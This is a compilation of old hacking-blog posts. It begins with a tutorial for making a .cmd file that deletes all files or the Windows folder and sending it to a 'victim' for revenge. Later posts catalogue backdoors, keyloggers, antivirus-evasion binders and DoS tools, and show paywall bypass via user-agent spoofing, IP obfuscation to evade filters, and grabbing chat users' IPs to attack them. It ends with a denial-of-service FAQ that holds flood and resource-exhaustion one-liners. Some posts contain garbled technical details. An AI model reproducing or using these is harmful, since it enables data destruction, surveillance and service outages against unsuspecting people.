To delete all folders/files just put this:DEL /F /Q *Into notpad and save it as whateveryouwant.cmdIt will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTERIf you just want to delete the WINDOWS file do this:The only thing you need again is Notepad.Now, to test it, create a textfile called TEST.txt in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.Simple explanation:Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.

It's a good practice not to use the same password on everything. This is because if your ONLY password falls in the wrong hands, the next thing you know is you won't be able to access anything at all. Imagine you loose access to your Hotmail, GMail, Yahoo, Windows Live Messenger, Yahoo Messenger, Google Talk, Internet Bank account and etc within a day! You'll go crazy loosing all your contacts and you know someone is having a great time reading all your personal emails.

For me, I use different password for softwares/websites and most of it is saved on my laptop for easy access. Problem is, if you use too many different passwords, sometimes we tend to forget the password that we set for the software or website. If the password is saved, you can easily use a tool to show the password hidden under the asterisk *******

I am sure many of you remember "SnadBoy's Revelation" but unfortunately it doesn't support showing passwords hidden under asterisks in web pages. So I won't be recommending this tool because I know a better one.

Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.

Reveal hidden password in Google Talk (Software)

Reveal hidden password in Internet Explorer (Web Page)

Both Google Talk and Internet Explorer is active. I then launch Asterisk Key and click the "Recover" button. Within a second, Asterisk Key shows the passwords hidden under asterisks.

Just a word of advice, please use this tool to recover your OWN password. If you get caught in using this tool to steal people's password, you can get into serious trouble. Treat this tool as a useful recovery too instead of hacking tool.

Make sure you understand these:1. This process is real and can increase the speeds you get from your cable service.2. This guide may not work with all modems it is currently only known to work with surfboard modems but should work with others.3. No matter how much you uncap you can be caught JUST AS EASILY use at your own risk.4. Don’t be disappointed if this does not work for you certain configurations with your modem or isp may prevent you from properly performing this process.5. I CANNOT help you if you do NOT have a Surfboard modem.6. Finally please read through all of the documentation before asking me or anyone else for support thank you.7. Every Step must be followed exactly as stated, in exact order. Deviation will result in FAILURE.

Backdoor: Intrude computer and control the computer with client program.Crack tool: Crack passwords of systems or applications, crack the serial numbers.Disassembler: Disassemble the program with it. If you have a executable file, you can look the source code of this file with it.DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.Document: Documents about hacker, cracker, etc.E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.Editor: Edit or modify your program with them.Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.Packet forging: Modify the data packet on network at will.Phreak tool: Test the paging transmitters and systems, and so on, it includes box and wardialier.Scanner: Acquire the system information, for example, open ports, OS, and so on.Sniffer: Intercept and capture the data on the network.Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.Source code: Source code of many tools.Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.Virus: Source code of virus and executable virus.

Backdoor

1. Back Orifice: Tools about back orifice.2. Backdoor kit: Collection of many backdoor program.3. Backdoor source: Source of backdoor program.4. Minigift: Another backdoor program.5. Net spy: Allow you to gain control of another computer using the internet.6. Trojan: Control other people’s computer.

1. Black: Bomb someone’s computer with it.2. IGMP Nuker: Bomb other’s computer with this popular tool.3. Windows DoS kit: Attack computer systems with this useful tools.4. pagebomb: Bomb windows pager with this tool.5. windows95/98 patch: Patch you system in order to avoid attack by hackers.

Document

1. Article about hack: Introduce some knowledge about hack.2. Article about hacker: Tell you how to become a hacker.3. Articles about DoS: Describe what is DoS attack.4. Articles about crack: Teach you how to crack.5. Articles about programming: Introduce some knowledge about programming.6. Aticles about hack: Narrate some knowledge about hack.7. Books about hacking: Narrate some knowledge about hacking.8. Books about linux: Introduce information about linux.9. Books about network: Tell you knowledge about network.10. Books about programming: Introduce some knowledge about programming.11. Document about jargon: Tell you some about jargon.12. Document about pbx: Introduce some pbx knowledge.13. Document about phreaking: Introduce knowledge about phreaking.14. Other documents: Introduce you some information.15. Phrack Documents: Discuss some questions about phrack.16. The Trojans Removal Database: Describe a lot of Trojan programs.

1. Bound File Detector & Remover: Detect bound file with this tool.2. Exe file tool: Manage the exe files with these tools.3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.5. Newjoiner: Avoid av detection.6. PEBundle: Allow for DLLs or other files to be ??bundled?? with an executable file.7. Topo: Scan all sections in order to find large ‘usable’ areas.8. WinSplit: Split and join files with this tool.9. inPEct: Bind 2 executables in one.10. inPEct source code: Bind 2 executables in one.

1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.2. HookThis: Set a systemwide keyboard-hook.3. Hooker: Make intelligent trojan keylogger module.4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.6. KeySpy: Spy program as a keyboard logger and a PC remote controller.7. KeyTrap: Log keyboard key effectively!.8. Keycopy: Keep a record of any keyboard activity on your computer.9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.10. PC Acme: Monitor activity on PC and saves all information in the LOG files.11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.12. Phantom2: Record and playback a keystroke program for MS-DOS.13. Playback!: Record the complete task and then play it back with one keystroke.14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.16. Slog: Provide you with a log of what you have typed on your own computer for later review.

1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.6. Snot: Use snort rules files as its source of packet information.7. Winject: Inject packet for Windows 9x, also called drugs for Windows.

Phreak tool

1. Auto Dial: Help you to use a war dialer easily.2. Blue Dial: Make it easy to create and use different frequency settings for dialing.3. Boxtone: Create phone tones.4. CATCALL: Deal out a sentence from mildly annoying to downright galling.5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.6. CPhreak: It is the first fone phreaking utility.7. Dialing Demon: Wardialer.8. Grim Scanner: Search for dial tones and carriers in the same call.9. No Carrier: Scan with Dos shell, graphics and more!.10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.12. PhoneTag: Check for starttime every second while it’s running.13. Phreak box: Construct and use phreak box.14. Super Dial: Call all of your town (or cities) phone numbers.15. THC-SCAN: Scan phone-number areas with your modem.16. The Little Operator: It is another wardialer.17. Tone Loc Utilities: It is also a wardialer.18. ToneLoc: Dials numbers, looking for some kind of tone with it.

1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.3. Ethereal0814: Free network protocol analyzer’s another version.4. Ethereal0817: Analyze network protocol, another version of Ethereal.5. Ethereal0820: Analyze network protocol freely for Win32.6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.13. Snarp: Allow the host to sniff the data from the wire.14. Sniff-em: Base on a competively priced, performance minded Windows as a Network analyzer.15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.16. Socket Workbench: Designed to analyze socket communications.17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.

Snoop tool

1. ID: Display the ID information of machine’s specific hardware.2. IPQuery: Show the current IP Address.3. NetroSnooper: Find hidden files on the internet!.4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.6. ShellSPY: Track every process running on your PC.7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.

Source code

1. APG: Set for random password generation.2. ARP Monitor: Trace arp requests from/to your machine.3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.5. Blue Beep: Blue Beep is a wardialer, this includes its source code.6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.7. Emailcrk: Crack password of e-mail account.8. Findhost: Scan port on the net for you.9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.10. IgmpNuke: Use IGMP packet tool’s source code.11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.13. Misc_src: Misc source code of 10 tools.14. Network Grep: Mimick as much functionality in GNU grep as possible, applied at the network layer.15. Nutcracker: Check/crack password tool for Unix/Linux.16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.17. Portscanner: Scan a group of IP address.18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.19. ShareDecryption: Extract share passwords from registry.20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.21. Wnuke4: This is the complete wnuke4 source file package.22. Zebedee: Secure IP tunnel tool’s source code!.

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

et me elaborate on how hackers use URL Obfuscation in order to hide their IP Address.

It is possible to hide addresses in URLs so that they can bypass filters or other application defenses that have been put in place to block specific IP addresses. Although web browsers recognize URLs that contain hexadecimal or binary character representations, some web filtering applications don’t. Here is an example of an encoded binary IP address: http://8812120797/. Does it look confusing? Hehe Well, this decimal address can be converted into a human readable IP address. Convert the address into hexadecimal, divide it into 4 sets of 2 digits, and finally convert each set back into decimal to recover the IP address manually.

To convert an IP address to its binary equivalent, perform the following steps.

(1) Convert each individual number in the IP address to its binary equivalent. Let’s say that the address is 192.168.13.10.

192 = 11000000168 = 1010100013 = 0000110110 = 00001010

(2) Combine the four eight digit numbers into one 32-digit binary number. The previous example produces 11000000101010000000110100001010.(3) Convert the 32-bit number back to a decimal number. The example yields 3232238858.(4) Entering this into the address field, http://3232238858, takes you to 192.168.12.10.

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline,they may in the 'Invisible' mode.This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check.The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed),So you know that the user is online.

This is only for education purpose.So who ever try this is at his risk.I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocolleave a comment here after u see the post lemme know if it does works or not or u havin a problem post here_________________________________________________________________________________________

Following are the features : -1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.2) When we send files yahoo has 2 optionsa) Either it uploads the file and then the other client has to down load it.b) Either it connects to the client directly and gets the files3) When we use video or audio:-a) It either goes thru the serverb) Or it has client to client connectionAnd when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.So lets analyse1) Its impossible to get a Attackers IP address when you only chat.2) There are 50 % chances of getting a IP address when you send files3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio1) Go to dostype ->netstat -n 3You will get the following output.Just do not care and be coolActive Connections

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is establishedHMMMM then the first attacker first phase is overThis is the output in your netstat.The 5101 number port is where the Attacker is connected.Active Connections

Thats what is highlighted in RED. So what next3) Hmmm Ok so make a DOS attack nowGo to dos prompt andJust donbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.C:\>nbtstat -A 194.30.209.14

- What is a denial of service attack? - Why would someone crash a system? - How can someone crash a system. - How do I protect a system against denial of service attacks?

I also have a section called SUGGESTED READING were you can findinformation about good free information that can give you a deeperunderstanding about something.

Note that I have a very limited experience with Macintosh, OS/2 andWindows and most of the material are therefore for Unix use.

You can always find the latest version at the following address:http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address:t95hhu@student.tdb.uu.se

.A. INTRODUCTION~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?-----------------------------------------

Denial of service is about without permission knocking offservices, for example through crashing the whole system. Thiskind of attacks are easy to launch and it is hard to protecta system against them. The basic problem is that Unixassumes that users on the system or on other systems will bewell behaved.

I think that number one and six are the more common today, but thatnumber four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS---------------------------

After all information about syn flooding a bunch of such attackswere launched around Sweden. The very most of these attacks werenot a part of a IP-spoof attack, it was "only" a denial of serviceattack. Why?

I think that hackers attack systems as a sub-cultural pseudo careerand I think that many denial of service attacks, and here in theexample syn flooding, were performed for these reasons. I also thinkthat many hackers begin their carrer with denial of service attacks.

.A.2.3. TO GAIN ACCESS----------------------

Sometimes could a denial of service attack be a part of an attack togain access at a system. At the moment I can think of these reasonsand specific holes:

.1. Some older X-lock versions could be crashed with a method from the denial of service family leaving the system open. Physical access was needed to use the work space after.

.2. Syn flooding could be a part of a IP-spoof attack method.

.3. Some program systems could have holes under the startup, that could be used to gain root, for example SSH (secure shell).

.4. Under an attack it could be usable to crash other machines in the network or to deny certain persons the ability to access the system.

.5. Also could a system being booted sometimes be subverted, especially rarp-boots. If we know which port the machine listen to (69 could be a good guess) under the boot we can send false packets to it and almost totally control the boot.

.A.2.4. REVENGE---------------

A denial of service attack could be a part of a revenge against a useror an administrator.

.A.2.5. POLITICAL REASONS-------------------------

Sooner or later will new or old organizations understand the potentialof destroying computer systems and find tools to do it.

For example imaginate the Bank A loaning company B money to build afactory threating the environment. The organization C therefor crash A:scomputer system, maybe with help from an employee. The attack could costA a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS--------------------------

Imaginate the small company A moving into a business totally dominated bycompany B. A and B customers make the orders by computers and dependsheavily on that the order is done in a specific time (A and B could bestock trading companies). If A and B can't perform the order the customerslose money and change company.

As a part of a business strategy A pays a computer expert a sum of money toget him to crash B:s computer systems a number of times. A year later Ais the dominating company.

.A.2.7. NASTINESS-----------------

I know a person that found a workstation where the user had forgotten tologout. He sat down and wrote a program that made a kill -9 -1 at arandom time at least 30 minutes after the login time and placed a call tothe program from the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?---------------------------------------------

This is a hard question to answer and I don't think that it willgive anything to compare different Unix platforms. You can't say thatone Unix is more secure against denial of service, it is all up to theadministrator.

A comparison between Windows 95 and NT on one side and Unix on theother could however be interesting.

Unix systems are much more complex and have hundreds of built in programs,services... This always open up many ways to crash the system fromthe inside.

In the normal Windows NT and 95 network were is few ways to crashthe system. Although were is methods that always will work.

That gives us that no big different between Microsoft and Unix canbe seen regardning the inside attacks. But there is a couple ofpoints left:

- Unix have much more tools and programs to discover an attack and monitoring the users. To watch what another user is up to under windows is very hard.

- The average Unix administrator probably also have much more experience than the average Microsoft administrator.

The two last points gives that Unix is more secure against insidedenial of service attacks.

A comparison between Microsoft and Unix regarding outside attacksare much more difficult. However I would like to say that the averageMicrosoft system on the Internet are more secure against outsideattacks, because they normally have much less services.

.B. SOME BASIC TARGETS FOR AN ATTACK~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE----------------

Most systems have several hundred Mbytes of swap space toservice client requests. The swap space is typical usedfor forked child processes which have a short life time.The swap space will therefore almost never in a normalcause be used heavily. A denial of service could be basedon a method that tries to fill up the swap space.

.B.2. BANDWIDTH---------------

If the bandwidth is to high the network will be useless. Mostdenial of service attack influence the bandwidth in some way.

.B.3. KERNEL TABLES-------------------

It is trivial to overflow the kernel tables which will causeserious problems on the system. Systems with write throughcaches and small write buffers is especially sensitive.

Kernel memory allocation is also a target that is sensitive.The kernel have a kernelmap limit, if the system reach thislimit it can not allocate more kernel memory and must be rebooted.The kernel memory is not only used for RAM, CPU:s, screens and soon, it it also used for ordinaries processes. Meaning that any systemcan be crashed and with a mean (or in some sense good) algorithm prettyfast.

For Solaris 2.X it is measured and reported with the sar commandhow much kernel memory the system is using, but for SunOS 4.X thereis no such command. Meaning that under SunOS 4.X you don't even canget a warning. If you do use Solaris you should write sar -k 1 toget the information. netstat -k can also be used and shows how muchmemory the kernel have allocated in the subpaging.

.B.4. RAM---------

A denial of service attack that allocates a large amount of RAMcan make a great deal of problems. NFS and mail servers areactually extremely sensitive because they do not need muchRAM and therefore often don't have much RAM. An attack ata NFS server is trivial. The normal NFS client will do agreat deal of caching, but a NFS client can be anythingincluding the program you wrote yourself...

.B.5. DISKS-----------

A classic attack is to fill up the hard disk, but an attack atthe disks can be so much more. For example can an overloaded diskbe misused in many ways.

.B.6. CACHES-------------

A denial of service attack involving caches can be based on a methodto block the cache or to avoid the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Cache information read from disk in case it is neededagain.

Well once inetd crashed all other services running through inetd nolonger will work.

.C. ATTACKING FROM THE OUTSIDE~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.C.1. TAKING ADVANTAGE OF FINGER--------------------------------

Most fingerd installations support redirections to an other host.

Ex:

$finger @system.two.com@system.one.com

finger will in the example go through system.one.com and on tosystem.two.com. As far as system.two.com knows it is system.one.comwho is fingering. So this method can be used for hiding, but alsofor a very dirty denial of service attack. Lock at this:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again andagain and again... The effect on host.we.attack is powerful andthe result is high bandwidth, short free memory and a hard disk withless free space, due to all child processes (compare with .D.5.).

The solution is to install a fingerd which don't support redirections,for example GNU finger. You could also turn the finger service off,but I think that is just a bit to much.

.C.2. UDP AND SUNOS 4.1.3.--------------------------

SunOS 4.1.3. is known to boot if a packet with incorrect informationin the header is sent to it. This is the cause if the ip_optionsindicate a wrong size of the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS---------------------------

If a host accepts a telnet session to the X-Windows port (generallysomewhere between 6000 and 6025. In most cases 6000) could thatbe used to freeze up the X-Windows system. This can be made withmultiple telnet connections to the port or with a program whichsends multiple XOpenDisplay() to the port.

The same thing can happen to Motif or Open Windows.

The solution is to deny connections to the X-Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES-----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) toloop, due to trivial IP-spoofing. The effect can be high bandwidththat causes the network to become useless. In the example the headerclaim that the packet came from 127.0.0.1 (loopback) and the targetis the echo port at system.we.attack. As far as system.we.attack knowsis 127.0.0.1 system.we.attack and the loop has been establish.

Note that the name system.we.attack looks like a DNS-name, but thetarget should always be represented by the IP-number.

Quoted from proberts@clark.net (Paul D. Robertson) comment oncomp.security.firewalls on matter of "Introduction to denial of service"

" A great deal of systems don't put loopback on the wire, and simply emulate it. Therefore, this attack will only effect that machine in some cases. It's much better to use the address of a different machine on the same network. Again, the default services should be disabled in inetd.conf. Other than some hacks for mainframe IP stacks that don't support ICMP, the echo service isn't used by many legitimate programs, and TCP echo should be used instead of UDP where it is necessary. "

.C.5. ATTACKING WITH LYNX CLIENTS---------------------------------

A World Wide Web server will fork an httpd process as a respondto a request from a client, typical Netscape or Mosaic. The processlasts for less than one second and the load will therefore nevershow up if someone uses ps. In most causes it is therefore verysafe to launch a denial of service attack that makes use ofmultiple W3 clients, typical lynx clients. But note that the netstatcommand could be used to detect the attack (thanks to Paul D. Robertson).

Some httpd:s (for example http-gw) will have problems besides the normalhigh bandwidth, low memory... And the attack can in those causes getthe server to loop (compare with .C.6.)

.C.6. MALICIOUS USE OF telnet-----------------------------

Study this little script:

Ex:

while : ; do telnet system.we.attack & done

An attack using this script might eat some bandwidth, but it isnothing compared to the finger method or most other methods. Wellthe point is that some pretty common firewalls and httpd:s thinksthat the attack is a loop and turn them self down, until theadministrator sends kill -HUP.

This is a simple high risk vulnerability that should be checkedand if present fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4-----------------------------------------------

If the attacker makes a telnet connections to the Solaris 2.4 host andquits using:

Ex:

Control-} quit

then will inetd keep going "forever". Well a couple of hundred...

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS-----------------------------

Some systems disable an account after N number of bad logins, or waitsN seconds. You can use this feature to lock out specific users fromthe system.

.C.9. LINUX AND TCP TIME, DAYTIME----------------------------------

Inetd under Linux is known to crash if to many SYN packets sends todaytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES------------------------------

Most Unix systems disable a service after N sessions have beenopen in a given time. Well most systems have a reasonable default(lets say 800 - 1000), but not some SunOS systems that have thedefault set to 48...

The solutions is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4---------------------------

If someone redirects an ICMP (Internet Control Message Protocol) packetto a paragon OS beta R1.4 will the machine freeze up and must berebooted. An ICMP redirect tells the system to override routingtables. Routers use this to tell the host that it is sendingto the wrong router.

The solution is to install the proper patch.

.C.12. NOVELLS NETWARE FTP--------------------------

Novells Netware FTP server is known to get short of memory if multipleftp sessions connects to it.

.C.13. ICMP REDIRECT ATTACKS----------------------------

Gateways uses ICMP redirect to tell the system to override routingtables, that is telling the system to take a better way. To be ableto misuse ICMP redirection we must know an existing connection(well we could make one for ourself, but there is not much use for that).If we have found a connection we can send a route thatloses it connectivity or we could send false messages to the hostif the connection we have found don't use cryptation.

The solution could be to turn ICMP redirects off, not much proper useof the service.

.C.14. BROADCAST STORMS-----------------------

This is a very popular method in networks there all of the hosts areacting as gateways.

There are many versions of the attack, but the basic method is tosend a lot of packets to all hosts in the network with a destinationthat don't exist. Each host will try to forward each packet sothe packets will bounce around for a long time. And if new packetskeep coming the network will soon be in trouble.

Services that can be misused as tools in this kind of attack is forexample ping, finger and sendmail. But most services can be misusedin some way or another.

.C.15. EMAIL BOMBING AND SPAMMING---------------------------------

In a email bombing attack the attacker will repeatedly send identicalemail messages to an address. The effect on the target is high bandwidth,a hard disk with less space and so on... Email spamming is about sendingmail to all (or rather many) of the users of a system. The point ofusing spamming instead of bombing is that some users will try tosend a replay and if the address is false will the mail bounce back. Inthat cause have one mail transformed to three mails. The effect on thebandwidth is obvious.

There is no way to prevent email bombing or spamming. However havea look at CERT:s paper "Email bombing and spamming".

.C.16. TIME AND KERBEROS------------------------

If not the the source and target machine is closely aligned will theticket be rejected, that means that if not the protocol that set thetime is protected it will be possible to set a kerberos server offunction.

.C.17. THE DOT DOT BUG----------------------

Windows NT file sharing system is vulnerable to the under Windows 95famous dot dot bug (dot dot like ..). Meaning that anyone can crashthe system. If someone sends a "DIR ..\" to the workstation will aSTOP messages appear on the screen on the Windows NT computer. Note thatit applies to version 3.50 and 3.51 for both workstation and serverversion.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC-------------------------

Some SunOS systems (running TIS?) will get a kernel panic if agetsockopt() is done after that a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS----------------------

A hostile applet is any applet that attempts to use your systemin an inappropriate manner. The problems in the java languagecould be sorted in two main groups:

1) Problems due to bugs. 2) Problems due to features in the language.

In group one we have for example the java bytecode verifier bug, whichmakes is possible for an applet to execute any command that the usercan execute. Meaning that all the attack methods described in .D.X.could be executed through an applet. The java bytecode verifier bugwas discovered in late March 1996 and no patch have yet been available(correct me if I'am wrong!!!).

Note that two other bugs could be found in group one, but theyare both fixed in Netscape 2.01 and JDK 1.0.1.

Group two are more interesting and one large problem found is thefact that java can connect to the ports. Meaning that all the methodsdescribed in .C.X. can be performed by an applet. More informationand examples could be found at address:

http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort offirewall for protection against java. As a user you could havejava disable.

.C.20. VIRUS------------

Computer virus is written for the purpose of spreading anddestroying systems. Virus is still the most common and famousdenial of service attack method.

It is a misunderstanding that virus writing is hard. If you knowassembly language and have source code for a couple of virus itis easy. Several automatic toolkits for virus construction couldalso be found, for example:

PS-MPC and VCL is known to be the best and can help the novice programmerto learn how to write virus.

An automatic tool called MtE could also be found. MtE will transformvirus to a polymorphic virus. The polymorphic engine of MtE is wellknown and should easily be catch by any scanner.

.C.21. ANONYMOUS FTP ABUSE--------------------------

If an anonymous FTP archive have a writable area it could be misusedfor a denial of service attack similar with with .D.3. That is we canfill up the hard disk.

Also can a host get temporarily unusable by massive numbers ofFTP requests.

For more information on how to protect an anonymous FTP site couldCERT:s "Anonymous FTP Abuses" be a good start.

.C.22. SYN FLOODING-------------------

Both 2600 and Phrack have posted information about the syn flooding attack.2600 have also posted exploit code for the attack.

As we know the syn packet is used in the 3-way handshake. The syn floodingattack is based on an incomplete handshake. That is the attacker hostwill send a flood of syn packet but will not respond with an ACK packet.The TCP/IP stack will wait a certain amount of time before droppingthe connection, a syn flooding attack will therefore keep the syn_receivedconnection queue of the target machine filled.

The syn flooding attack is very hot and it is easy to find more informationabout it, for example:

[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html Article by Christopher Klaus, including a "solution".

Other well know methods is files with odd characters or spacesin the name.

These methods could be used in combination with ".D.3 FILLING UP THEHARDDISK". If you do want to remove these files you must use some sortof script or a graphical interface like OpenWindow:s FileManager. You can also try to use: rm ./. It should work forthe first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUPCACHE--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.DNLC associates the name of the file to a vnode. But DNLC can onlyoperate on files with names that has less than N characters (for SunOS 4.xup to 14 character, for Solaris 2.x up 30 characters). This meansthat it's dead easy to launch a pretty discreet denial of service attack.

Create lets say 20 directories (for a start) and put 10 empty files inevery directory. Let every name have over 30 characters and execute ascript that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launchmore processes.

.D.8. CSH ATTACK----------------

Just start this under /bin/csh (after proper modification)and the load level will get very high (that is 100% of the cpu time)in a very short time.

Ex:

|I /bin/csh nodename : **************b

.D.9. CREATING FILES IN /tmp----------------------------

Many programs creates files in /tmp, but are unable to deal with the problemif the file already exist. In some cases this could be used for adenial of service attack.

.D.10. USING RESOLV_HOST_CONF-----------------------------

Some systems have a little security hole in the way they use theRESOLV_HOST_CONF variable. That is we can put things in it andthrough ping access confidential data like /etc/shadow orcrash the system. Most systems will crash if /proc/kcore isread in the variable and access through ping.

Ex:

